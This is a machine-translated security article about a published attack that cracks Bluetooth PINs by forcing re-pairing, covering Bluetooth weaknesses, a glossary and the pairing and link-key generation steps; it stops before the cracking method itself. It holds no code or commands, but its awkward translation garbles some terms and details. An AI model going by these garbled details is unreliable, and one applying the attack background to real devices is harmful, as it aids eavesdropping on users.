Note: ThisArticleWe will only talk about the latest attack technology against the Bluetooth PIN code to remind everyone to take precautions and have no other purpose. No one may use the technology described in this article to do anything illegal.
Recently, a number of domestic and foreign websites have published a news about the latest attack technology against the Bluetooth PIN code: By forcing two bluetooth devices that are in communication to re-pair and listen for matching information, attackers can crack a four-digit (decimal) PIN code within 0.063 seconds. The world Wireless Technology Conference held in early June this year also discussed the attack method in detail. securityfocus even said, "This new attack technology has shocked many information security experts who are concerned about wireless technology, because previous studies on Bluetooth pin attacks only involved incorrect Bluetooth configurations or specific environments, this is the first time that a comprehensive description of the attack technology ". In response to this Bluetooth attack technology, WDA, which focuses equally on entertainment and technology, follows up and explores the following Attack Details and hopes to discuss them with those interested in Bluetooth technology.
I. Overview
Bluetooth is a protocol that enables short-distance wireless connections between multiple devices, it is widely used in wireless devices, image processing, security products, consumer entertainment, automotive products, household appliances, and other fields. As a wireless technology, Bluetooth provides security mechanisms such as key management, authentication, and confidentiality. However, in the past few years, some attack methods against the bluetooth technology have been proposed, including information leakage, data theft, and counterfeit attacks. The security problems of the bluetooth technology include the following:
1. The security of the entire Bluetooth system depends on the confidentiality of the pin code. Due to low security awareness, the length of the PIN code selected by the user is usually short, which greatly increases the possibility of the PIN code being cracked.
2. Password used by the Bluetooth protocolAlgorithmThese cryptographic algorithms are simple and self-developed by bluetooth designers. From the perspective of password analysis, a mature cryptographic algorithm can only be recognized after long-term practice. Due to the lack of testing, the new cryptographic algorithm may have some defects.
3. Bluetooth is suitable for short-distance communication within 10 meters. It is difficult for attackers to approach the attack target. However, on a pedestrian street or in a congested environment, attackers may search for Bluetooth communication within 10 meters by starting a bluetooth device. In addition, the latest IEEE 802.11 standard can be used to expand the distance of Bluetooth communication cheaply.
4. As bluetooth technology is becoming more and more popular, especially when Bluetooth Software can be installed on PDAs and portable computers, information stored on PDAs and portable computers is also attracting more and more interest from hackers.
Ii. Glossary
Pairing: pairing is the process of mutual confirmation when two bluetooth devices communicate for the first time. After the two bluetooth devices are paired, the subsequent communication connection does not have to be confirmed every time, which is very convenient.
Pin (personal identification number): personal identification code. The length of the PIN code used for Bluetooth is 1-8 decimal digits (8-bits ).
Db_addr: the address of the bluetooth device. Each Bluetooth transceiver is assigned a unique 48-bit device address, similar to the MAC address of the PC Nic. The two bluetooth devices obtain the db_addr address of the other device through inquiry at the beginning of the communication. Iii. Bluetooth pairing and authentication process
Bluetooth supports three security modes. The first is the "safe operation" mode in which the device does not have any security measures. The second is the "Business-level security mode" that requires no security protocol to be enabled before the channel is established ". The third is the "link-level security mode" that requires the terminal to enable the security protocol before the link is established ". Among them, the "link-level security mode" has the highest security level. This article discusses the attack technology for this level.
1. pairing and authentication
Three steps are required for Bluetooth communication initialization: generating an initial key (kinit), generating a link key (KAB), and mutual authentication. Next, use an encryption key to protect future communication. Before pairing, You need to input the PIN code to a bluetooth device. In some devices (such as wireless headphones), the pin is fixed and cannot be changed. It must be noted that the pin on both sides must match; otherwise, communication is not allowed. Next we will discuss the details of pairing and mutual authentication.
. Generate an initial key (kinit)
The initial key kinit T is 128 bits in length and is generated by the E22 algorithm. Figure 1 describes the process of generating a kinit key. First, the device that puts forward the communication requirements is called the master device, represented by a; the device that passively communicates is called the slave device (slave), represented by B. As you can see, the input (plaintext) of the E22 algorithm consists of the following three parts:
1) obtain the address bd_addr from the device's physical address: bd_addr.
2) PIN code and its length. The PIN code is pre-set by both devices.
3) a random number (in_rand) with 128 bits ). Generated by the master device and transmitted in plaintext to the slave device.
Because the master and slave devices use the same E22 algorithm, if the values of the above three parts of both devices are equal, then the calculated kinit values should be the same.
. Generate the link key KAB as shown in Figure 2. First, master device a generates a 128-bit random number lk_randa, and Device B also generates a 128-bit random number lk_randb. In master device A, kinit and lk_randa perform bitwise logic exclusive or operation and send the exclusive or result to device B. Similarly, in Device B, kinit and lk_randb perform bitwise logic exclusive or operation, and the result is sent to device. After these exchanges, devices A and B have the same kinit, lk_randa, and lk_randb. As shown in figure 2, device A and Device B use the E21 algorithm to encrypt lk_randa, bd_addra, lk_randb, and bd_randrb respectively, and convert the results to different values or obtain KAB. Figure 2